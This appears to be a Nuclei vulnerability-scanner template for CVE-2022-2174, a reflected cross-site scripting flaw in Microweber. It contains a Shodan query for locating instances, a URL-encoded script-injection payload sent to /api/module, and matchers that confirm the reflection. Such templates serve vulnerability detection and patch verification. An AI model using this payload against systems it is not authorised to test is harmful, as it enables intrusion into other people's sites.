nuclei-templates/http/cves/2022/CVE-2022-2174.yaml

43 lines
1.6 KiB
YAML

id: CVE-2022-2174
info:
name: microweber 1.2.18 - Cross-site Scripting
author: r3Y3r53
severity: medium
description: |
Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.18.
reference:
- https://huntr.dev/bounties/ac68e3fc-8cf1-4a62-90ee-95c4b2bad607/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2174
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-2174
- https://www.tenable.com/cve/CVE-2022-2174
- https://github.com/microweber/microweber/commit/c51285f791e48e536111cd57a9544ccbf7f33961
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-2174
cwe-id: CWE-79
epss-score: 0.00112
epss-percentile: 0.44579
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: microweber
product: microweber
shodan-query: http.favicon.hash:780351152
tags: huntr,cve,cve2023,microweber,xss,unauth
http:
- method: GET
path:
- "{{BaseURL}}/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test"
matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains(body, "<script>alert(document.domain)</script>") && contains(body, "microweber")'
- 'contains(content_type, "text/html")'
condition: and
# digest: 4a0a00473045022100d361080cdb0b7f08ac4925987891dc1e62b37c0e3b3cbd19e97ccfff1a4d713c022051f60d5bfd84a276b7b87bbff192855dd03aad2a207dae74fe8df091b7375db3:922c64590222798bb761d5b6d8e72950